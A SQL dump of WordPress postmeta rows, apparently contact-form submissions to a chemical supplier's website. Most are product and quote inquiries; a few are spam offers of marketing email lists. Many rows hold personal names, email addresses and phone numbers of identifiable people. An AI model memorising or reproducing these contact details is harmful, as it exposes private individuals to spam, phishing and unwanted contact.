INSERT INTO `wp_postmeta` VALUES (31516, 3515, '_field_3', 'Hi,\r\n\r\nWishing you all the best at the IPC APEX EXPO 2017.\r\n\r\nI hope you are the right person to discuss about the Electronics Manufacturing Industry Database 2017 which includes complete contact details and verified email addresses, CEO&#039;s, Directors, Purchasing managers, Production managers, Engineers, Manufacturers, OEMs, Decision Makers of Wholesalers, Distributors, Suppliers, Equipment Manufactures, Medical device Manufacturers, Networking equipments, Radio and Television Broadcasting and Communications Equipment, Motors and Generators Manufacturing, Motor Vehicle Parts and Accessories Manufacturing, Electronic, Household Appliance Manufacturing, Computer and Computer Software Stores, Automobiles, Motor Vehicle Parts and Accessories Manufacturing Industry and many more across US/UK/CANADA, Europe and all over the world.\r\n\r\nJob Titles - Reach top-level executives like - CEO&#039;s; CTOs, VPs, Directors; Sales &amp; Marketing Managers, Decision-makers from Manufacturing, Purchasing managers, Production managers, Engineers etc.\r\n\r\nI am sure this is the right time to generate maximum revenue from your customers. Please let me know your Exact Target Audience and Geographical area that you would like to reach, so that I can send you more information.\r\n\r\nHoping to hearing from you soon.\r\n\r\nKind Regards,\r\nGena Morgan\r\nProspecting Email Lists, Inc.\r\ngena@prospectingemaillists.com\r\nhttp://www.onlinemarketinglists.com \r\n\r\nIf you do not wish to receive any further email, please reply as Remove in the subject line. '); 
INSERT INTO `wp_postmeta` VALUES (31517, 3515, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31518, 3515, '_sub_id', '3515'); 
INSERT INTO `wp_postmeta` VALUES (31519, 3516, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (31520, 3516, '_seq_num', '207'); 
INSERT INTO `wp_postmeta` VALUES (31521, 3516, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31522, 3516, '_field_12', 'Zayyan Chowdhury'); 
INSERT INTO `wp_postmeta` VALUES (31523, 3516, '_field_13', 'Miller-Stephenson Chemical Co.'); 
INSERT INTO `wp_postmeta` VALUES (31524, 3516, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (31525, 3516, '_field_14', 'zchowdhury@mschem.com'); 
INSERT INTO `wp_postmeta` VALUES (31526, 3516, '_field_15', '(203) 743-4447'); 
INSERT INTO `wp_postmeta` VALUES (31527, 3516, '_field_16', 'trial test 1 g zip comp'); 
INSERT INTO `wp_postmeta` VALUES (31528, 3516, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (31529, 3516, '_sub_id', '3516'); 
INSERT INTO `wp_postmeta` VALUES (31530, 3517, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31531, 3517, '_seq_num', '275'); 
INSERT INTO `wp_postmeta` VALUES (31532, 3517, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31533, 3517, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31534, 3517, '_field_1', 'Zayyan Chowdhury'); 
INSERT INTO `wp_postmeta` VALUES (31535, 3517, '_field_10', 'Miller-Stephenson Chemical Co.'); 
INSERT INTO `wp_postmeta` VALUES (31536, 3517, '_field_2', 'zchowdhury@mschem.com'); 
INSERT INTO `wp_postmeta` VALUES (31537, 3517, '_field_8', '(203) 743-4447'); 
INSERT INTO `wp_postmeta` VALUES (31538, 3517, '_field_3', 'gzip trial 1'); 
INSERT INTO `wp_postmeta` VALUES (31539, 3517, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31540, 3517, '_sub_id', '3517'); 
INSERT INTO `wp_postmeta` VALUES (31541, 3518, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31542, 3518, '_seq_num', '276'); 
INSERT INTO `wp_postmeta` VALUES (31543, 3518, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31544, 3518, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31545, 3518, '_field_1', 'Oscar Tellez'); 
INSERT INTO `wp_postmeta` VALUES (31546, 3518, '_field_10', 'Biosense Webster'); 
INSERT INTO `wp_postmeta` VALUES (31547, 3518, '_field_2', 'otellez1@its.jnj.com'); 
INSERT INTO `wp_postmeta` VALUES (31548, 3518, '_field_8', '(915) 496-4000'); 
INSERT INTO `wp_postmeta` VALUES (31549, 3518, '_field_3', 'Good afternoon:\r\n\r\nI am Oscar Tellez and I am supplier quality engineer for Biosense Webster Incorporated (BWI). I understand that you are a supplier for Coherex Medical and you provide the 0244 Krytox GPL206 . So, I contact with you because I have Joanna Saffo as a primary contact for Miller-Stephenson Chemical Co, but I do not have any specific contact information as his/her position, email and phone. Please, can you email me this information?. We need it for a project where Coherex will be integrated to BWI&#039;s quality system.\r\n\r\nI will appreciate if you can send this information and any question please feel free to let me know.\r\n\r\nThank you in advance\r\nRegards!\r\n'); 
INSERT INTO `wp_postmeta` VALUES (31550, 3518, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31551, 3518, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31552, 3518, '_field_1', 'Oscar Tellez'); 
INSERT INTO `wp_postmeta` VALUES (31553, 3518, '_field_10', 'Biosense Webster'); 
INSERT INTO `wp_postmeta` VALUES (31554, 3518, '_field_2', 'otellez1@its.jnj.com'); 
INSERT INTO `wp_postmeta` VALUES (31555, 3518, '_field_8', '(915) 496-4000'); 
INSERT INTO `wp_postmeta` VALUES (31556, 3518, '_field_3', 'Good afternoon:\r\n\r\nI am Oscar Tellez and I am supplier quality engineer for Biosense Webster Incorporated (BWI). I understand that you are a supplier for Coherex Medical and you provide the 0244 Krytox GPL206 . So, I contact with you because I have Joanna Saffo as a primary contact for Miller-Stephenson Chemical Co, but I do not have any specific contact information as his/her position, email and phone. Please, can you email me this information?. We need it for a project where Coherex will be integrated to BWI&#039;s quality system.\r\n\r\nI will appreciate if you can send this information and any question please feel free to let me know.\r\n\r\nThank you in advance\r\nRegards!\r\n'); 
INSERT INTO `wp_postmeta` VALUES (31557, 3518, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31558, 3518, '_sub_id', '3518'); 
INSERT INTO `wp_postmeta` VALUES (31559, 3519, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31560, 3519, '_seq_num', '277'); 
INSERT INTO `wp_postmeta` VALUES (31561, 3519, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31562, 3519, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31563, 3519, '_field_1', 'Daniel Crowley'); 
INSERT INTO `wp_postmeta` VALUES (31564, 3519, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (31565, 3519, '_field_2', 'daniel.r.crowley@navy.mil'); 
INSERT INTO `wp_postmeta` VALUES (31566, 3519, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (31567, 3519, '_field_3', 'I have tried several times to reset my password.  Each time the system keeps going in circles.  What is best way to reset.'); 
INSERT INTO `wp_postmeta` VALUES (31568, 3519, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31569, 3519, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31570, 3519, '_field_1', 'Daniel Crowley'); 
INSERT INTO `wp_postmeta` VALUES (31571, 3519, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (31572, 3519, '_field_2', 'daniel.r.crowley@navy.mil'); 
INSERT INTO `wp_postmeta` VALUES (31573, 3519, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (31574, 3519, '_field_3', 'I have tried several times to reset my password.  Each time the system keeps going in circles.  What is best way to reset.'); 
INSERT INTO `wp_postmeta` VALUES (31575, 3519, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31576, 3519, '_sub_id', '3519'); 
INSERT INTO `wp_postmeta` VALUES (31577, 3521, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31578, 3521, '_seq_num', '278'); 
INSERT INTO `wp_postmeta` VALUES (31579, 3521, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31580, 3521, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31581, 3521, '_field_1', 'Alexander '); 
INSERT INTO `wp_postmeta` VALUES (31582, 3521, '_field_10', 'RUSKY GROUP'); 
INSERT INTO `wp_postmeta` VALUES (31583, 3521, '_field_2', 'ar@itrusky.ru'); 
INSERT INTO `wp_postmeta` VALUES (31584, 3521, '_field_8', '(929) 913-9737'); 
INSERT INTO `wp_postmeta` VALUES (31585, 3521, '_field_3', 'Good day,\r\nDera Sir/Madam\r\n\r\nII would like to clarify could you provide with the following information: what specification does release agent p/n MS-122RB meet requirements?\r\n\r\nThank you '); 
INSERT INTO `wp_postmeta` VALUES (31586, 3521, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31587, 3521, '_sub_id', '3521'); 
INSERT INTO `wp_postmeta` VALUES (31588, 3522, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (31589, 3522, '_seq_num', '208'); 
INSERT INTO `wp_postmeta` VALUES (31590, 3522, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31591, 3522, '_field_12', 'Alexander `'); 
INSERT INTO `wp_postmeta` VALUES (31592, 3522, '_field_13', 'RUSKY GROUP'); 
INSERT INTO `wp_postmeta` VALUES (31593, 3522, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (31594, 3522, '_field_14', 'ar@itrusky.ru'); 
INSERT INTO `wp_postmeta` VALUES (31595, 3522, '_field_15', '(929) 913-9737'); 
INSERT INTO `wp_postmeta` VALUES (31596, 3522, '_field_16', 'Good day,\r\nDear Sir/Madam \r\n\r\nI would like to clarify could you provide with the following information: what specification does p/n release agent, MS-1022RB1000 meet requirements?\r\n\r\nThank you '); 
INSERT INTO `wp_postmeta` VALUES (31597, 3522, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (31598, 3522, '_sub_id', '3522'); 
INSERT INTO `wp_postmeta` VALUES (31599, 3523, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31600, 3523, '_seq_num', '279'); 
INSERT INTO `wp_postmeta` VALUES (31601, 3523, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31602, 3523, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31603, 3523, '_field_1', 'Noel BERNHARD'); 
INSERT INTO `wp_postmeta` VALUES (31604, 3523, '_field_10', 'GSBTC'); 
INSERT INTO `wp_postmeta` VALUES (31605, 3523, '_field_2', 'noelbenhard@yahoo.com'); 
INSERT INTO `wp_postmeta` VALUES (31606, 3523, '_field_8', '(632) 868-6049'); 
INSERT INTO `wp_postmeta` VALUES (31607, 3523, '_field_3', 'We are looking for a coating to protect honeycomb cardboard used as shuttering for concrete pouring. The coating shall provide abrasion resistance , waterproofing and improve the stiffness of the cardboard to resist concrete pressure. The surface of the finished coating should be smooth enough to allow stripping of forms without use of  form oil. Which coating system do you recommend for this use ? Thanks.'); 
INSERT INTO `wp_postmeta` VALUES (31608, 3523, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31609, 3523, '_sub_id', '3523'); 
INSERT INTO `wp_postmeta` VALUES (31610, 3524, '_edit_lock', '1485550699:2'); 
INSERT INTO `wp_postmeta` VALUES (31611, 3524, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (31612, 3524, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (31613, 3524, '_yoast_wpseo_focuskw_text_input', 'Bearing Grease'); 
INSERT INTO `wp_postmeta` VALUES (31614, 3524, '_yoast_wpseo_focuskw', 'Bearing Grease'); 
INSERT INTO `wp_postmeta` VALUES (31615, 3524, '_yoast_wpseo_title', 'The Perfect Bearing Grease | TriboSys™ | Krytox™ | DuPont™ Teflon'); 
INSERT INTO `wp_postmeta` VALUES (31616, 3524, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (31617, 3524, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (31618, 3527, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31619, 3527, '_seq_num', '280'); 
INSERT INTO `wp_postmeta` VALUES (31620, 3527, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31621, 3527, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31622, 3527, '_field_1', 'Savo Todoric'); 
INSERT INTO `wp_postmeta` VALUES (31623, 3527, '_field_10', 'Comtest Networks'); 
INSERT INTO `wp_postmeta` VALUES (31624, 3527, '_field_2', 'stodoric@comtestnetworks.com'); 
INSERT INTO `wp_postmeta` VALUES (31625, 3527, '_field_8', '(613) 818-9958'); 
INSERT INTO `wp_postmeta` VALUES (31626, 3527, '_field_3', 'Hello,\r\nI have question for the dialectic strength of the MS-465C / 467C. In the specification you have dielectric strength 2000 volts/mil. I assume that mil represent 0.001&quot; not mm. Correct?\r\nBest Regards,\r\nSavo   '); 
INSERT INTO `wp_postmeta` VALUES (31627, 3527, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31628, 3527, '_sub_id', '3527'); 
INSERT INTO `wp_postmeta` VALUES (31629, 3529, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31630, 3529, '_seq_num', '281'); 
INSERT INTO `wp_postmeta` VALUES (31631, 3529, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31632, 3529, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31633, 3529, '_field_1', 'Anthony Torchia'); 
INSERT INTO `wp_postmeta` VALUES (31634, 3529, '_field_10', 'EdmondMarks Technologies, Inc.'); 
INSERT INTO `wp_postmeta` VALUES (31635, 3529, '_field_2', 'ttorchia@edmondmarks.com'); 
INSERT INTO `wp_postmeta` VALUES (31636, 3529, '_field_8', '(732) 643-0290'); 
INSERT INTO `wp_postmeta` VALUES (31637, 3529, '_field_3', 'We would appreciate the price and availability of Miller Stevenson  Conformal Coating Stripper # 114C - quart and 1/2 gallon sizes\r\nThanks'); 
INSERT INTO `wp_postmeta` VALUES (31638, 3529, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31639, 3529, '_sub_id', '3529'); 
INSERT INTO `wp_postmeta` VALUES (31640, 3530, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (31641, 3530, '_seq_num', '209'); 
INSERT INTO `wp_postmeta` VALUES (31642, 3530, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31643, 3530, '_field_12', 'Renee Amator'); 
INSERT INTO `wp_postmeta` VALUES (31644, 3530, '_field_13', 'Air Products'); 
INSERT INTO `wp_postmeta` VALUES (31645, 3530, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (31646, 3530, '_field_14', 'amatorrm@airproducts.com'); 
INSERT INTO `wp_postmeta` VALUES (31647, 3530, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (31648, 3530, '_field_16', 'Can you tell me if you still manufacture Safezone solvent flux remover and Safezone precision cleaning solvent?  I am updating an internal standard that lists them as approved cleaning products, but I want to make sure they still exist and if there is a data sheet available.  Thanks.'); 
INSERT INTO `wp_postmeta` VALUES (31649, 3530, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (31650, 3530, '_sub_id', '3530'); 
INSERT INTO `wp_postmeta` VALUES (31651, 3531, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (31652, 3531, '_seq_num', '210'); 
INSERT INTO `wp_postmeta` VALUES (31653, 3531, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31654, 3531, '_field_12', 'Jeff Thomas'); 
INSERT INTO `wp_postmeta` VALUES (31655, 3531, '_field_13', 'Johnstech International Corp.'); 
INSERT INTO `wp_postmeta` VALUES (31656, 3531, '_field_18', '1981081'); 
INSERT INTO `wp_postmeta` VALUES (31657, 3531, '_field_14', 'jpthomas@johnstech.com'); 
INSERT INTO `wp_postmeta` VALUES (31658, 3531, '_field_15', '(612) 656-6244'); 
INSERT INTO `wp_postmeta` VALUES (31659, 3531, '_field_16', 'Hello,\nPlease provide REACH (SVHC updated 1/12/17), RoHS 2 compliance statements for product # MS-222N\nAlso please provide a SDS if applicable.\n\nThank you,\nJeff Thomas'); 
INSERT INTO `wp_postmeta` VALUES (31660, 3531, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (31661, 3531, '_sub_id', '3531'); 
INSERT INTO `wp_postmeta` VALUES (31662, 3532, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31663, 3532, '_seq_num', '282'); 
INSERT INTO `wp_postmeta` VALUES (31664, 3532, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31665, 3532, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31666, 3532, '_field_1', 'Sandra fernandes'); 
INSERT INTO `wp_postmeta` VALUES (31667, 3532, '_field_10', 'Kougar media'); 
INSERT INTO `wp_postmeta` VALUES (31668, 3532, '_field_2', 'sandra.fernandes1601@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (31669, 3532, '_field_8', '(222) 222-4207'); 
INSERT INTO `wp_postmeta` VALUES (31670, 3532, '_field_3', 'Hi,\r\nI was researching about your company online and got to know about you’re participating in the CAMX 2017\r\n  Would you be interested in acquiring *Targeted Professionals Email list* with updated emails and phone numbers with top level decision makers?\r\nThis list is the best source to awareness about your marketing projects.\r\nComplete Data fields: All our records includes permission based business email addresses and complete business contact info like contact name, company name, company URL, title, phone number, fax number, physical address, employee size, revenue size, SIC code, industry classification, technology used and last verified date.\r\nPlease find the below details of some of the contacts available in our database and let me know your thoughts:\r\n\r\n	Healthcare Industry:      Hospitals, Medical Clinics, Physicians (Radiologist, Anesthesiologists, Dermatologists, Pediatricians, Veterinary, Ophthalmologists, Cardiologists, Orthopedic, Pharmacist, Cosmetologists,               Aesthetic professionals, dentists) and Doctors, Nurses, Plastic Surgeons etc.\r\n	Meeting Industry:                   incentives, conferences, events, frequent travelers, Business travel industry and many more….\r\n	Information Technology:    Computer Hardware, Software, and IT Resellers etc.\r\n	Automotive Industry:          Automobile dealers, New &amp; Used Car Dealers, Used Car Dealers etc.\r\n	Finance &amp; Banking:               Insurance Agents, Banks, Financial Services, Credit Agency Non-Bank etc.\r\n	Publishing Industry:             Trade Publishing, Educational Publishing, Book Publishing, etc.\r\n	Manufacturing Industry:     Food, Kindred Products, Textile, Apparel, Furniture, Fixtures etc.\r\n	Education Industry:               Schools, College, University, Teachers, K-12 education, Principals; Deans etc.\r\n	Construction:                           Architectural firms, Power and Energy, Electrical, Transportation etc.,\r\n	Hospitality List:                       Hotels and Motels List, Lodging &amp; Resorts List, Restaurants List, Recreation List etc.\r\n	Technology User:                   SAP, MS Users, Oracle, ERP, CRM, Sage, Accounting Software, VMware etc.\r\n	Whole sale retail :                 Beauty, Health &amp; Wellness, Health &amp; Wellness, Health &amp; Wellness, Business, Food / Beverage, Grocery / C Store and many more….\r\n	Real Estate Industry:             Real Estate Appraisers, Brokers &amp; Agents, Buyers &amp; Brokers, Consultants, Consultants, Investments etc.\r\n	Sports Marketing:                  Sports Marketing, Design Services, Distribution etc.\r\n If this is of interest to you, please email me with your requirement, so that we can send more information and few samples at no cost.\r\nIf you are not the decision maker on this, please forward email to the right contact.\r\nAppreciate your time &amp; look forward to hear from you.\r\n\r\nRegards,\r\nSandra fernandes\r\nOnline Marketing Executive\r\n If you don&#039;t wish to receive our newsletters, reply back with &quot;Leave-Out&quot; in subject line\r\n\r\n'); 
INSERT INTO `wp_postmeta` VALUES (31671, 3532, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31672, 3532, '_sub_id', '3532'); 
INSERT INTO `wp_postmeta` VALUES (31673, 3533, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (31674, 3533, '_seq_num', '211'); 
INSERT INTO `wp_postmeta` VALUES (31675, 3533, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31676, 3533, '_field_12', 'Tom O&#039;Marra'); 
INSERT INTO `wp_postmeta` VALUES (31677, 3533, '_field_13', 'Preferred Utilities Mfg. Corp'); 
INSERT INTO `wp_postmeta` VALUES (31678, 3533, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (31679, 3533, '_field_14', 'tomarra@preferred-mfg.com'); 
INSERT INTO `wp_postmeta` VALUES (31680, 3533, '_field_15', '(203) 743-6741'); 
INSERT INTO `wp_postmeta` VALUES (31681, 3533, '_field_16', 'Good Morning. We currently purchase Silicone Conformal Coating from M-S, part # MS-460H. Could you please confirm if it is approved to the following standards: ANSI/ISA-71.04-1985 Class G3,   CEI IEC 654-4-1987 Class 3,   UL508,   CSA (Canadian). These are not listed on the product&#039;s data sheet, but I figured it&#039;d be worth asking. Thanks!'); 
INSERT INTO `wp_postmeta` VALUES (31682, 3533, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (31683, 3533, '_sub_id', '3533'); 
INSERT INTO `wp_postmeta` VALUES (31684, 3534, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31685, 3534, '_seq_num', '283'); 
INSERT INTO `wp_postmeta` VALUES (31686, 3534, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31687, 3534, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31688, 3534, '_field_1', 'Nicklas Polizzi'); 
INSERT INTO `wp_postmeta` VALUES (31689, 3534, '_field_10', 'Willamette Valley Company'); 
INSERT INTO `wp_postmeta` VALUES (31690, 3534, '_field_2', 'nicklas.polizzi@wilvaco.com'); 
INSERT INTO `wp_postmeta` VALUES (31691, 3534, '_field_8', '(541) 484-9621'); 
INSERT INTO `wp_postmeta` VALUES (31692, 3534, '_field_3', 'Hello,\r\nI am looking for an epoxy resin or modifier for a wood adhesive. The properties of that resin or modifier should be able to lower the viscosity of the base resin of my formulation to provide deeper penetration into the wood tissue. It should also have high affinity to the wood and good cohesive strength.\r\nAre there any of your products that you would suggest that would meet these requirements?\r\n\r\nThank you for your time,\r\n\r\nNicklas Polizzi'); 
INSERT INTO `wp_postmeta` VALUES (31693, 3534, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31694, 3534, '_sub_id', '3534'); 
INSERT INTO `wp_postmeta` VALUES (31695, 3535, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31696, 3535, '_seq_num', '284'); 
INSERT INTO `wp_postmeta` VALUES (31697, 3535, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31698, 3535, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31699, 3535, '_field_1', 'William M Stein'); 
INSERT INTO `wp_postmeta` VALUES (31700, 3535, '_field_10', 'Etesian Technologies LLC'); 
INSERT INTO `wp_postmeta` VALUES (31701, 3535, '_field_2', 'bill.stein@etesian-tech.com'); 
INSERT INTO `wp_postmeta` VALUES (31702, 3535, '_field_8', '(413) 835-5387'); 
INSERT INTO `wp_postmeta` VALUES (31703, 3535, '_field_3', 'Looking for conformal coating.  I will need to dip the small board assemblies in order to cover areas under an RF metal shield.  Looking for protection from marine (salt) environments.  Thanks.\r\n\r\nBill'); 
INSERT INTO `wp_postmeta` VALUES (31704, 3535, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31705, 3535, '_sub_id', '3535'); 
INSERT INTO `wp_postmeta` VALUES (31706, 3536, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31707, 3536, '_seq_num', '285'); 
INSERT INTO `wp_postmeta` VALUES (31708, 3536, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31709, 3536, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31710, 3536, '_field_1', 'Tom Fredrickson'); 
INSERT INTO `wp_postmeta` VALUES (31711, 3536, '_field_10', 'BAE Systems'); 
INSERT INTO `wp_postmeta` VALUES (31712, 3536, '_field_2', 'thomas.fredrickson@baesystems.com'); 
INSERT INTO `wp_postmeta` VALUES (31713, 3536, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (31714, 3536, '_field_3', 'It appears that your MS-122RX Teflon release has been discontinued.  What is the most similar product currently available ?'); 
INSERT INTO `wp_postmeta` VALUES (31715, 3536, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31716, 3536, '_sub_id', '3536'); 
INSERT INTO `wp_postmeta` VALUES (31717, 3537, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31718, 3537, '_seq_num', '286'); 
INSERT INTO `wp_postmeta` VALUES (31719, 3537, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31720, 3537, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31721, 3537, '_field_1', 'Peter Thomas'); 
INSERT INTO `wp_postmeta` VALUES (31722, 3537, '_field_10', 'Sublime Data Inc.'); 
INSERT INTO `wp_postmeta` VALUES (31723, 3537, '_field_2', 'peter@sublimedata.us'); 
INSERT INTO `wp_postmeta` VALUES (31724, 3537, '_field_8', '(515) 861-6600'); 
INSERT INTO `wp_postmeta` VALUES (31725, 3537, '_field_3', 'Hi,\r\n\r\nI hope you are the right person to talk about new companies interested in having business relationships with you.\r\n\r\nIf yes, then let me know the specific industry you are interested in and we will send you a sample file of companies and their contacts with complete contact information such as Business email, Phone number, Names and Mailing address etc. of each executive.\r\n\r\nThese companies and contacts index can be used for your multi-marketing initiatives as well as new customer acquisition efforts your sales teams engage in.\r\n\r\nFurther, we can validate and clean any of the marketing databases you may currently have in-house, and append additional contacts or company information that can both save you valuable time and increase your sales.\r\n\r\nI look forward to your reply.  \r\n\r\nBest,\r\n\r\nPeter Thomas | Marketing Manager'); 
INSERT INTO `wp_postmeta` VALUES (31726, 3537, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31727, 3537, '_sub_id', '3537'); 
INSERT INTO `wp_postmeta` VALUES (31728, 204, '_oembed_4458bf4f07d918766f650d00ec889180', '<iframe width="1020" height="574" src="https://www.youtube.com/embed/tbzqYPsuauI?feature=oembed" frameborder="0" allowfullscreen></iframe>'); 
INSERT INTO `wp_postmeta` VALUES (31729, 204, '_oembed_time_4458bf4f07d918766f650d00ec889180', '1485957373'); 
INSERT INTO `wp_postmeta` VALUES (31730, 204, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (31733, 3545, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31734, 3545, '_seq_num', '287'); 
INSERT INTO `wp_postmeta` VALUES (31735, 3545, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31736, 3545, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31737, 3545, '_field_1', 'Sandi'); 
INSERT INTO `wp_postmeta` VALUES (31738, 3545, '_field_10', 'Miller'); 
INSERT INTO `wp_postmeta` VALUES (31739, 3545, '_field_2', 'Sandi.G.Miller@nasa.gov'); 
INSERT INTO `wp_postmeta` VALUES (31740, 3545, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (31741, 3545, '_field_3', 'Good morning,\r\nCan I please have a quote for 2 lbs of 862 epoxy resin, and 1/3 lb of W curing agent.\r\n\r\nThank you,\r\nSandi'); 
INSERT INTO `wp_postmeta` VALUES (31742, 3545, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31743, 3545, '_sub_id', '3545'); 
INSERT INTO `wp_postmeta` VALUES (31744, 3546, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31745, 3546, '_seq_num', '288'); 
INSERT INTO `wp_postmeta` VALUES (31746, 3546, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31747, 3546, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31748, 3546, '_field_1', 'Marco Giorgi '); 
INSERT INTO `wp_postmeta` VALUES (31749, 3546, '_field_10', 'FIDI FORNITURE SRL (Italy) '); 
INSERT INTO `wp_postmeta` VALUES (31750, 3546, '_field_2', 'procurement.fidi@libero.it'); 
INSERT INTO `wp_postmeta` VALUES (31751, 3546, '_field_8', '(347) 115-9638'); 
INSERT INTO `wp_postmeta` VALUES (31752, 3546, '_field_3', 'Italian company interested to buy directly from you \r\nn. 12 spry cans of MILLER STEPHENSON MS-122 AD\r\nwe need 2/3 of RSL\r\nadvice about shipping restriction if any applicable \r\nplease send quote asap\r\nregards  \r\n'); 
INSERT INTO `wp_postmeta` VALUES (31753, 3546, '_field_4', ''); 
